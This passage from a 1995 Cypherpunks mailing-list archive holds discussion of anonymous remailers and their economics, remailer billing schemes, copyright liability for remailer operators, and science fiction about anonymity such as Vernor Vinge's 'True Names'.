(sometimes anonymously) to various newsgroups. This has denied
the print media of revenue since readers only had to turn to
Usenet to read especially sensationalist articles.

4. In the past, the print media has held a monopoly on detailed news.
Sure, television could bring news stories instantly, but for detail
one had to turn to the newspaper. Usenet and the internet are capable
of providing very detailed information rapidly and on demand, changing
instantly as conditions change. It is a very real competitor.

5. Government regulation would seriously hurt Usenet. Censorship
(like an FCC censor) and regulation of anonymous remailers would
result in increased legal liability on the internet. Holding Usenet posters
and other providers of information liable for the accuracy and tastefulness
of their information would make many people think twice before making
their information available. This would eliminate not only inaccurate
and tasteless information, but it would also greatly hinder the
flow of even accurate information. This would put the print media on
a more even footing.

These facts together suggest that it might be to the advantage of
the print media to call for government regulation. Once this is realized,
the behavior of these newspapers can be better understood, and action
can be taken against them:

1. Misleading information in the print media about Usenet must be
widely disseminated so as to damage the reputations of newspapers
that print inaccurate accounts and encourage them to get their
facts straight the next time around.

2. The print media's self-interest in government regulation of Usenet
must be pointed out, both to the public and to law-makers so
as to reduce the effectiveness of their pleas.

3. Usenet should seek the support the of the media (especially
rivals like TV media that have less to lose from Usenet) to obtain
favorable and anti-regulatory publicity.

-> If you found this article interesting, please feel free to
distribute widely. <-



------------
To respond to the sender of this message, send mail to
remailer@soda.berkeley.edu, starting your message with
the following 8 lines:
::
Response-Key: the-clipper-key

====Encrypted-Sender-Begin====
MI@```%I^&2?(E<U9BPG1]W7L'=&KH_PWY8"RO>+YR'QAJ3&+D2`UAI&EZX\#
M%D0S6>LX!B&XC`CI2S9?]$AN7*P9K`)Q4JT_V`>$K2Z<X!O-/MH$TO5V:@(L
%BQ>,T(@`
====Encrypted-Sender-End====




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 5 Jan 95 07:05:49 PST
To: cypherpunks@toad.com
Subject: NYT on $GIF
Message-ID: <199501051505.KAA06613@pipe4.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Peter Lewis writes today on Compuserve and Unisys grub for 
royalties on GIF.

Perry has noted its sty, java-eyely.

For email copy send blank message with subject:  GIF_nip




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Thu, 5 Jan 95 11:50:51 PST
To: jpb@gate.net
Subject: Re: Remailer postage
In-Reply-To: <199501051802.NAA22909@seminole.gate.net>
Message-ID: <199501051942.LAA07959@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


jpb@gate.net wrote:

> I am concerned about the ethics of having a paymailer feed into the free
> remailer soup - how would their operators react if I'm effectively making money 
> (no matter how little) off of them?

I can't speak for others, but making money off remailing is a GOOD
THING. 

If other remailers wish to give their services away for free, so be
it. There will likely be an ecology of remailers with different fee
schedules, different technical capabilities, and different policies.
Personally, I think that "free remailers" will always be with us, but
will come and go, as spammers and the like abuse them. The invisible
hand will of course choose some and reject others.

And a for-pay remailer is not making money "off them" (the other
remailers), as the paying customer is the one who is making the choice
of which remailers to use, which to pay digital postage on, etc.

[Comment: I see disdainful comments here about the profit motive,
about for-pay services, etc. I urge folks to carefully think about
this point. Services that are "free" are actualy paid for by someone,
in various ways and for various motivations. Some things are worth
paying for, some are not. Any customer who pays for remailing has made
an uncoerced, voluntary decision that his interests are better
serviced by paying for remailing than by using a free remailer. Sounds
fair to me.]

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
408-688-5409           | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpb@gate.net
Date: Thu, 5 Jan 95 11:11:06 PST
To: nelson@crynwr.com
Subject: Remailer postage
Message-ID: <199501051802.NAA22909@seminole.gate.net>
MIME-Version: 1.0
Content-Type: text


Russ,

Where can I get the Magic Money software?  I'm also interested in a combination
FV/MM approach to anonymous postage.  I'm still waiting to get my linux box set
up (hassle with client paying the bill and all that fun stuff) but am
considering starting a remailer once I get the site set up.

I am concerned about the ethics of having a paymailer feed into the free
remailer soup - how would their operators react if I'm effectively making money 
(no matter how little) off of them?

In the interest of preserving anonymity, perhaps their should be a set postage
rate - that way someone could use a digital stamp anywhere, helping to confuse
the audit trail.

I'm not sure if I want to get involved in the hassles of redemption though.  It
would probably become a major hassle for all the operators to have to do that
much accounting on a regular basis.

jpb@gate.net
finger for pgp and ripem keys



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Thu, 5 Jan 95 13:49:56 PST
To: db@Tadpole.COM (Doug Barnes)
Subject: Re: Remailer postage
In-Reply-To: <9501052103.AA23382@tadpole.tadpole.com>
Message-ID: <199501052148.NAA07203@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Doug Barnes wrote:

> I strongly agree with Tim that one should not look
> down at for-profit anonymizing services. This is the
> _only_ way I see to establish and maintain reliable
> service and avoid spamming and denial of service.
> It's also the only way such a service can scale if 
> it becomes suddenly popular -- if there's no increased
> revenue, it's going to be harder to get more h/w and
> bandwidth.

Indeed, the problems Julf & Company are having in getting adequate CPU
power is illustrative. I see Julf saying he desperately needs some
more computer power (this was a few months back) and I see others
making the same tired old calls for "donations." (I say tired because
requests that some people make contributions to effectively pay for
the services used freely by others are rarely very effective....look
to the sorry state of public broadcasting "begathons" for one
example.)

Instead of pointless beggings of the form "If only everyone who used
Julf's service would send him $5," a pay-per-use system is much more
scalable, and "closes the loop" on who pays. To wit, those that use
the service, pay. Those that don't, don't.

(I understand that Russ Nelson has experience in the shareware
business, so he may know how many people send in their voluntary
contributions. My understanding is that it's a tiny fraction, and that
few shareware authors ever make much money. I've talked to some of
them, and they consider shareware a failed experiment, except for new
products trying to break into crowded markets, where the "shareware"
label is just a facade for essentially giving it away in exchange for
fame and eventual fortune if the product goes commercial.)

> Even if one had a heart of gold and purely charitable
> instincts, one would eventually come to the conclusion
> that such a service operates better if users are 
> paying for it. And this is even before we address matters
> like the benefits of competition.

Precisely. A for-pay remailer can also be pressured by customers to
enhance services, not take the remailer down for frivolous reasons,
etc. It's real hard to ask a "charityware" remailer to honor
comitments, add features, etc.

Simple economics, and free market anarchy. Nobody here is proposing
that fees be set (how could we?), that free remailers be banned
(how?), etc. Those that want to give away their products are free to
do so, just as those who want to charge $25 per remailing are free to
do so.

Free remailers will have a place, but will likely get "discovered" by
spammers and by those who see no costs in adding it to their remailer
chains. Hence, overuse. (More precise than "overuse": crowding, poor
service, flakiness, etc.) Just like anything else in economics.

The users ("the market") will largely determine how it all shakes out.
There are fortunately no government agencies in any of the countries I
know of that claim to be able to set fee schedules, ban "price
gouging," ban "underpricing," or regulate remailers in any practical
way.

service, flakiness, etc.) Just like anything else in economics. 

(Such moves may someday come, but that's another topic.)

--Tim



-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
408-688-5409           | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Thu, 5 Jan 95 11:14:40 PST
To: cypherpunks@toad.com
Subject: Re: Remailer postage
In-Reply-To: <199501051802.NAA22909@seminole.gate.net>
Message-ID: <m0rPxhl-0008ZFC@crynwr.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


   From: jpb@gate.net
   Date: Thu, 5 Jan 1995 13:02:57 -0500 (EST)

   I am concerned about the ethics of having a paymailer feed into the free
   remailer soup - how would their operators react if I'm effectively making money 
   (no matter how little) off of them?

There is no ethical problem.  How do they know someone isn't making
money off them already?  If they haven't considered that, they should.

-- 
-russ <nelson@crynwr.com>    http://www.crynwr.com/crynwr/nelson.html
Crynwr Software   | Crynwr Software sells packet driver support | ask4 PGP key
11 Grant St.      | +1 315 268 1925 (9201 FAX)  | What is thee doing about it?
Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: db@Tadpole.COM (Doug Barnes)
Date: Thu, 5 Jan 95 13:03:52 PST
To: jpb@gate.net
Subject: Re: Remailer postage
In-Reply-To: <199501051802.NAA22909@seminole.gate.net>
Message-ID: <9501052103.AA23382@tadpole.tadpole.com>
MIME-Version: 1.0
Content-Type: text/plain



I strongly agree with Tim that one should not look
down at for-profit anonymizing services. This is the
_only_ way I see to establish and maintain reliable
service and avoid spamming and denial of service.
It's also the only way such a service can scale if 
it becomes suddenly popular -- if there's no increased
revenue, it's going to be harder to get more h/w and
bandwidth.

Even if one had a heart of gold and purely charitable
instincts, one would eventually come to the conclusion
that such a service operates better if users are 
paying for it. And this is even before we address matters
like the benefits of competition.

Doug




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Thu, 5 Jan 95 14:32:10 PST
To: s675570@aix1.uottawa.ca (Angus Patterson)
Subject: Re: True Names
In-Reply-To: <Pine.3.89.9501051627.A53015-0100000@aix1.uottawa.ca>
Message-ID: <199501052231.OAA11745@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Angus Patterson wrote:
> 
> I've been trying to get True Names by Vernor Vinge, and have been told it's
> out of print (like most good cypunk ), does anybody have it scanned? 
> I realize this is without permission, so does anybody have Vinge's address?
> (e-mail or otherwise) or could anybody ask him? Btw, does he have any other
> crypto/anonymity related stories? Thanks in advance.

I see copies in used bookstores often. It's in the collection "True
Names and Something-or-other" and was in print until recenly. I also
have the Bluejay edition, with an afterward by Marvin Minsky.

Check around any large used bookstore.

It's too long for reasonable scanning (and I have both a scanner and
an OCR program, and scanned-in one or more of the papers at the soda
site) and would bring on heat. Besides, it's just too easy to find in
bookstores or libraries, regardless of being "out of print."

As to other such stories, "The Ungoverned" is interesting. And fo
course the "Peace War" and "Marooned in Realtime" (aka "Mushrooms in
Real Slime") novels have some futurist items of interest. (In
particular, I think of public key crypto as "bobbling" data inside,
encasing data in a silvery sphere unbreachable by outsiders. I
mentioned this to Vinge once and he was amused.)

Finally, his Hugo-winning novel, "A Fire Upon the Deep," has some
casual mentions of crypto, including the odd speculation that those in
the know in the distant future don't really trust public key crypto.

Death to vermin!

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
408-688-5409           | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 5 Jan 95 15:11:42 PST
To: cypherpunks@toad.com
Subject: Vinge reference in Moving Mars
Message-ID: <199501052312.PAA26449@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Greg Bear's novel Moving Mars, now out in paperback, has a cute reference
to Vernor Vinge's ideas from True Names.  p.208:

"'Don't stick on the names,' Orianna said, shaping the living room into
more Regency.  'All my friends are into Vernoring.  They work and play
with fake names.  I don't know their true ones.  Not even their parents
know.'
"'Why?'
"'It's a game.  Two rules - nobody knows what you're doing, and you do
nothing illegal.'
"'Doesn't that take the fun out of doin crypto?' I asked.
"'Wow - crypto!  Hide in the tomb.  Sorry.  I shy from two-edged words.
We call it Vernoring.'
"'Doesn't it?' I persisted.
"'No,' Oriana said thoughtfully.  'Illegal is harm.  Harm is stupid.
Stupid is its own game, and none of my friends play it.  Here's Kite.'"

The book is pretty good, lots of nano and other hot tech, but not much
crypto (sorry, Vernoring)...  A little slow in places, though.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Thu, 5 Jan 95 15:31:01 PST
To: cypherpunks@toad.com
Subject: RSADSI Conference - Extra Passes?
Message-ID: <9501052330.AA15736@doom.intuit.com>
MIME-Version: 1.0
Content-Type: text/plain



A cohort of mine is in need of a pass to next week's RSADSI
conference, which, unfortunately, is sold out.  So if anyone has a
pass that they're not planning to use for a half-day or so, please
drop me an e-mail and I will be in your debt.

Thanks!

--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: erc@s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
Date: Thu, 5 Jan 95 14:40:30 PST
To: cypherpunks@toad.com
Subject: available NNTP posting sites?
Message-ID: <m0rQ0rl-0004IOC@s116.slcslip.indirect.com>
MIME-Version: 1.0
Content-Type: text


Does anyone have a list of NNTP sites that take connections from anyone
for posting?  My regular NNTP site seems to be hosed, or something, and
I have a post that needs to get out, but also needs to originate from
this site.  Thanks in advance :)
-- 
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager

Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi
                       ** PGP encrypted email preferred! **

"What's the use of distant travel if only to discover - you're homeless in
your heart."  --Basia, "Yearning"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Lane <blane@seanet.com>
Date: Thu, 5 Jan 95 16:01:25 PST
To: Angus Patterson <s675570@aix1.uottawa.ca>
Subject: Re: True Names
In-Reply-To: <Pine.3.89.9501051627.A53015-0100000@aix1.uottawa.ca>
Message-ID: <Pine.NXT.3.91.950105160104.11259A-100000@kisa>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 5 Jan 1995, Angus Patterson wrote:

> I've been trying to get True Names by Vernor Vinge, and have been told it's
> out of print (like most good cypunk ), does anybody have it scanned? 
> I realize this is without permission, so does anybody have Vinge's address?
> (e-mail or otherwise) or could anybody ask him? Btw, does he have any other
> crypto/anonymity related stories? Thanks in advance.

  Go your local library and request it. Here in the states they will 
search all over for you. I had a paperback copy in about 3 weeks. 
Excellent book I might add.

     Brian

------------------------------------------------------------------------------
"Everyone is a prisoner holding their own key."    | finger blane@seanet.com 
    -- Journey                                     | PGP 2.6 email accepted
------------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Thu, 5 Jan 95 16:47:41 PST
To: cypherpunks@toad.com
Subject: Re: True Names
Message-ID: <9501060048.AA11061@netmail2.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Timothy C. May

I see copies in used bookstores often. It's in the collection "True
Names and Something-or-other" and was in print until recenly. I also
have the Bluejay edition, with an afterward by Marvin Minsky.
..............................................................


I bought one at Half-Price Books.  I don't know what edition it is, 
it's a dingy little paperback with a signature in it of some stranger 
that I wouldn't know.   I keep it with my "previously owned" collection.

Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Thu, 5 Jan 95 14:08:40 PST
To: nelson@crynwr.com
Subject: Re: Remailer Abuse
Message-ID: <9501052114.AA03759@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Russ Nelson writes:
>    Heh. An anonymous remailer paid for by credit card... 

> Sure, I'll know who used it, but I'm not going to keep that
> information.  (Yes, yes, FV says that I have to keep records of who
> bought what, but I'll label all my information with a random number,
> that simply says that X bought information worth Y, not *what*
> information.)  And if you don't trust a remailer operator, then you
> won't use it.

I'd be worried about a couple of issues - 
one is just the transaction cost - can you successfully market remailer use
at a buck a shot or whatever you'd be charging beyond FV's 29c stamp,
or would you have some convenient way to aggregate bill?
Beyond that, though, are some traffic analysis problems -
remailers require a fair bit of traffic to be useful, and unless
you receive a reasonable amount of encrypted traffic, 
and support encrypted email for purchasing remailer service
and other merchandise, an eavesdropper would have a fairly good source
of traffic data on your remailer users, especially since buying and using 
remailer service requires two messages within an hour or so.

An alternative billing mechanism, which wouldn't use Chaum-patented cash,
would be to sell a bunch of one-shot random-number tokens.
When you sell the tokens, you add them to the database of valid tokens,
and when one comes in on a message you delete it.
This allows you to sell more than one message or service-period per 
FV transaction, and separates the purchase and use by a longer time,
without adding the need for record-keeping based on the user's ID.
It obviously does require encrypted reply messages.

Another variant is for the user to send you a bunch of tokens
along with the purchase, which you store.  Blind signatures would improve
the security of this process, but require more computation and
may involve Chaum's patents.  In this case, the message from the client
to you would be encrypted, but you wouldn't have to send a reply,
so the request could come in anonymously.

	Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ddt@lsd.com (Dave Del Torto)
Date: Thu, 5 Jan 95 16:13:34 PST
To: Angus Patterson <s675570@aix1.uottawa.ca>
Subject: C-LIT: Vernor Vinge's "A Fire Upon the Deep" (was: Re: True Names)
Message-ID: <ab32340f410210037a5d@[192.187.167.52]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:48 pm 1/5/95, Angus Patterson wrote:
>I've been trying to get True Names by Vernor Vinge, and have been told it's
>out of print (like most good cypunk ), does anybody have it scanned?
>I realize this is without permission, so does anybody have Vinge's address?
>(e-mail or otherwise) or could anybody ask him? Btw, does he have any other
>crypto/anonymity related stories? Thanks in advance.

Amazing that you should mention this, Angus: I *just* finished reading "A
Fire Upon the Deep" and it is not only exeedingly gnarly, but also features
a universal net, galactic-wide relays and Netscum-like service providers
and associated user kvetching, a sinister-billions-of-years-old-AI-virus,
newsgroups, lists populated by aliens - and even _crypto_ as the key to the
whole shebang. There's also a great futuristic "dig" on pub key encryption
buried in it. Neural net stuff. A possible explanation for the existence of
both God and Newt Gingrich...and I could go on.

Great read, true anus-clenching adventure... and this from one who does NOT
normally read anything more sci-fi than certain software manuals. :)
Strongly recommended for c-punks who can last 600 pages (after the first
ten, you're hopelessly hooked if you have half a brain left afdter reading
this list for a year or two).

I _WISH_ I had VV's email address! I'd like to send the guy a big thank-you
and ask if he's writing a sequel (yet). If anyone does know it, puh-LEEze
mail me. First book of his I've read, first of it's kind I've enjoyed in a
very long time. I'll scan my favorite crypto-related (legal-length) excerpt
and post it next week, howzat?

  dave
_________________________
 Big books small
 Books high books tall
 Just give me a good
 Little book,
 That's all.

     -Truman Capote (age 11)



C-LIT = Cypherpunk LITerature. Gitcher mind outta the gutter there, Lancelot.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Godwin <mnemonic@eff.org>
Date: Thu, 5 Jan 95 13:27:04 PST
To: eric@remailer.net (Eric Hughes)
Subject: Re: Warning letter from Co$. [any comments ?]
In-Reply-To: <199501050801.AAA18013@largo.remailer.net>
Message-ID: <199501052127.QAA09356@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


 
Actually, civil copyright infringement liability doesn't turn on
knowledge. You can be an infringer even if you don't know.

Criminal copyright infringement requires a guilty mental state, so *that*
you have to know.


>    From: Avi Harris Baumstein <avi@clas.ufl.edu>
> 
>    i know there has been much chatter on this subject, but are there
>    truly any precedents that could hold on the anonymous distribution of
>    copyrighted material?
> 
> Cubby v. Compuserve is relevant here, as well as that bookstore case
> in the 50's that I never remember the name of.  Mike G., can you help
> me out on this one?
> 
> These cases are about other kinds of wrongs (libel in one and
> obscenity (?) in the other), but copyright violation doesn't seem to
> be have any particular features to set it apart from the basic
> principle of these.  Namely, if you know, you're responsible; if you
> don't, you're not.  This, you all realize no doubt, is a gross
> simplification of a long chain of reasoning.
> 
>    what
>    exactly constitutes a trade secret, and what sort of laws apply?
> 
> The short answer is that if you didn't sign a trade secret agreement
> or are party to one by some other relationship (such as agency), then
> a trade secret that comes your way is no secret any more.
> 
>    >    clients'  property   rights.    Courts   are   holding   such
>    >    contributory  infringers  liable.   Two  examples  are:  Sega
>    >    Enterprises Ltd.  v.  Maphia BBS, 30 U.S.P.Q.  2d 1921  (N.D.
>    >    Cal.   1994) and Playboy Enterprises v.  Frena, 839 F.  Supp.
>    >    1152 (M.D.  Fla.  1993).
> 
>    what of these cases? is this just an example of typical lawyerly
>    intimidation tactics? 
> 
> I have personal experience with the first case.  It was a local BBS
> run by a friend of a friend, and I got involved a year ago right after
> the seizure.  (It was, BTW, a _civil_ seizure of a BBS, not criminal.)
> I believe the case settled out of court.  There were court documents
> approving the seizure however; I don't know if these set precedent or
> not.  I suspect not, because the action was entirely _ex parte_ (Latin
> for one-sided).  Mike, again?  Other legal folk?
> 
> I know nothing about the second one.
> 
>    nhow do you remailer-ops plan to react? my first
>    instinct (were i running a remailer) would be to ignore it, on grounds
>    that i wouldn't examine any mail passing through. 
> 
> The people who keep logs, yes, are in more danger than those who don't.
> 
> Eric
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Angus Patterson <s675570@aix1.uottawa.ca>
Date: Thu, 5 Jan 95 13:45:27 PST
To: cypherpunks@toad.com
Subject: True Names
Message-ID: <Pine.3.89.9501051627.A53015-0100000@aix1.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


I've been trying to get True Names by Vernor Vinge, and have been told it's
out of print (like most good cypunk ), does anybody have it scanned? 
I realize this is without permission, so does anybody have Vinge's address?
(e-mail or otherwise) or could anybody ask him? Btw, does he have any other
crypto/anonymity related stories? Thanks in advance.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Thu, 5 Jan 95 17:07:10 PST
To: cypherpunks@toad.com
Subject: Re: True Names
In-Reply-To: <9501060048.AA11061@netmail2.microsoft.com>
Message-ID: <199501060107.RAA18958@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> Blanc Weber <blancw@microsoft.com> writes:

> I see copies in used bookstores often. It's in the collection "True
> Names and Something-or-other" and was in print until recenly. I also

"True Names and Other Dangers" -- I think it's a Baen edition.

> have the Bluejay edition, with an afterward by Marvin Minsky.

Me too, and I also have the first published version, which is in
"Binary Star #5" with "Nightflyers" by George R. R. Martin.

Great book -- I want to be a cybergod when I grow up.

	Jim Gillogly
	15 Afteryule S.R. 1995, 01:06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael  Conlen <meconlen@IntNet.net>
Date: Thu, 5 Jan 95 14:44:10 PST
To: Jonathan Cooper <entropy@IntNet.net>
Subject: Re: Siegel and Lewis
In-Reply-To: <Pine.SV4.3.91.950104192503.17118H-100000@xcalibur>
Message-ID: <Pine.SV4.3.91.950105171747.13888A-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 4 Jan 1995, Jonathan Cooper wrote:

> > is how can they regulate what private business and citizen's do with 
> > there Fiber Optic's, ISDN lines, telephone lines, and computers. If the
> 
>    They already do - look at the regulations on telcos, power companies, 
> water companies, cellular/paging companies, lawyers, doctors, etc. 

A big difference between the 'net and some of the above, is that the net 
has been around in a very large presence (internatonaly) before the laws 
are being introduced, where as paging and cellular service didnt exist. 
As far as lawyers and doctors and lawyers, one of the big things the 
government does is protect agianst quacks. Not to many people are going to 
argue with this. The government wants to protect us from speech in the 
case of the 'net, well there are quite a few people who are going to 
stand up for their first amenment rights. 

If you want your own communication service, you can buy it. weather you 
use fiber based WAN's or go straight for satalite service, used by 
companies such as Holiday Inn, or Circuit City. You can exchange any 
information you want. 

I think the important thing to remember is that net access is not a 
right. My service provider has the right to give service to whom they 
please, as long as race, sex, or creed are not deciding factors. 

What goes across .gov and .mil computers is one thing, however what 
commes across sprintlink's computers to my service proveder to my 
computer is up to sprintlink, Intnet.net and myself. I dont care to read 
racist comments, so I dont view them. If I want to download nudie gifs, 
its my business, and right as stated under the First Amenment.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 5 Jan 95 14:40:11 PST
To: John Young <cypherpunks@toad.com
Subject: GIF_nip
Message-ID: <v01510101ab32255ff5ee@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain




-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Thu, 5 Jan 95 17:50:45 PST
To: jim@acm.org
Subject: Re: True Names
Message-ID: <9501060151.AA16068@netmail2.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Jim Gillogly

> Blanc Weber <blancw@microsoft.com> writes:

> I see copies in used bookstores often. It's in the collection "True
> Names and Something-or-other" and was in print until recenly. I also
.............................................................

No, No, Jim, that wasn't me saying that  -  that statement was made by 
a cpunkgod.
Mine was beneath it.

Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Thu, 5 Jan 95 15:30:21 PST
To: cypherpunks@toad.com
Subject: Anonymity in Donating
Message-ID: <199501052335.SAA16921@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Some nice examples of the preservation of anonymity in charitable donations, 
both for the donor and for the recipient, caught my attention today.

An article by Clare Ulrich in the December 1994 Communique (Vol.18 No.3), 
published by The Cornell Campaign, pays tribute to an anonymous donor
to Cornell U.:
"While some acts of generosity are marked by a name on a building or a plaque
on a wall, others, so to speak, can be counted among the philanthropic 
`whodunits.' These are the anonymous gifts, and Communique would like to 
profile several innovative projects that one anonymous donor helped launch
this year. According to the donor, anonymity provides greater freedom to `pick
and choose' projects that are personally interesting. This donor is 
particularly attracted to programs that involve computer technology or promise
to generate benefits beyond the scope of the immediate project. [...] The
same donor who declined recognition for these high-tech projects also provided
support for 24 high school juniors from Boys Harbor in Harlem to attend the
six-week Cornell Summer College Program in 1994, as well as the two previous
summers. [...] Although this anonymous donor may not be interested in getting
a name on something, he certainly leaves an indelible mark on the quality of
education at Cornell."

Closer to home, our dept. chair Dave Stemple broadcast a request for donations
to an anonymous recipient:
"One of our undergrad majors lived in Amherst Crossings, which burned down
last week. As a result this student, a senior who had planned to graduate this
spring, is destitute and needs help or he will be unable to complete his
degree. If you would like, you can contribute clothes or money (cash only
please in order to maintain the student's anonymity) to him. [...]"

Incidentally, I received my B&W C'punks shirt from Kevin Prigge a few weeks
ago, and consider myself a very satisfied customer. I made a point of wearing
it on the flights both ways for a recent vacation I took in California. On the
return trip, I was delayed at O'Hare for over an hour due to a leaky window
on the airplane. A man in his 50s or 60s approached me and asked, with a smirk,
what a Cypherpunk was. I explained a bit, mentioning the passage of the DT
bill. Noting the mention of the NSA on the shirt, the man mentioned that his
son is working at Apple "with the NSA"....

 -L. Futplex McCarthy; PGP key by finger or server   "The objective is for us 
  to get those conversations whether they're by an alligator clip or ones and 
  zeroes. Wherever they are, whatever they are, I need them." -FBI Dir. Freeh

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLwyA6mf7YYibNzjpAQFENAQA09JTWr501ZJliFWK4efY8py2OhgBq8gy
rqYvrGX+EZ49Uq+IDU2DjiiPBHuYPOE23wb/QfouhmKaSSUMqifYTd+uau247Cot
CC+CYceBvH3oK35oTr7CahSqb4JLUNs4atOkoYtpbYPG5qrR8yJkAGBKbVzQZHKt
ioUFB5xhYKA=
=QD4b
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLwyB+CoZzwIn1bdtAQEgkAF+OBkRShMO+Et/Kr8AkPXPz564xgNnhzfP
WPSO0W0UCpkg/e7bQIliMCXiyzp7nHQr
=1IBd
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Thu, 5 Jan 95 18:56:29 PST
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: floating point crypto?
In-Reply-To: <v01510100ab3251fa70de@[199.0.65.105]>
Message-ID: <199501060251.SAA26936@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Robert H. has asked that we reply in e-mail to him, to avoid
"cluttering the list more than I already have...," but the logic of
this is faulty. The few lines of a response such as this one, or even
of several such responses, are as nothing compared to dozens or more
people sifting their own archives so they can each independently send
Robert what they find. Hence my public reply.

Robert Hettinga wrote:

> I casually mentioned somewhere else that I saw something on this list about
> floating-point math being used in crypto, contrary to popular belief, and
> somebody had the *timerity* to call me on it. ;-).
> 
> I think it had to do with factoring, but maybe even in key-generation,
> though that doesn't sound right at all...

The thread was "Pentium bug and CRYPTO," and it hit on 1994-11-21 and
lasted a few days. Posts by Derek Atkins, Mike Duvos, and others
stated persuasively that no floating point operations are included in
PGP, that no FP coprocessor is needed or used for PGP, and that the
Pentium bug could not affect PGP.

(In another thread, which I have no intention of trying to dig up now,
